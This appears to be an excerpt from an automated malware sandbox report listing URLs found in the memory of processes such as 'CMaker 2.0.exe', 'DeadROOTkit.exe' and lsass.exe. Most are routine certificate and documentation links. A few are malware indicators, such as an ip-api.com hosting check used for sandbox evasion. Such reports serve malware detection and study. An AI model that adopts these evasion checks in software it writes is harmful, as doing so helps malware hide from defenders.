                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472203869.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323371929.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                        Source: lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: lsass.exe, 00000014.00000002.3476204379.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2324334654.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                        Source: lsass.exe, 00000014.00000000.2323129454.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471566712.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: CMaker 2.0.exe, 00000005.00000003.2236584735.0000022D350B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                        Source: CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241810301.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2248531599.0000022D34DB5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232649259.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2240132556.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233299609.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                        Source: DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.000000000305A000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2359290982.000001DE74842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
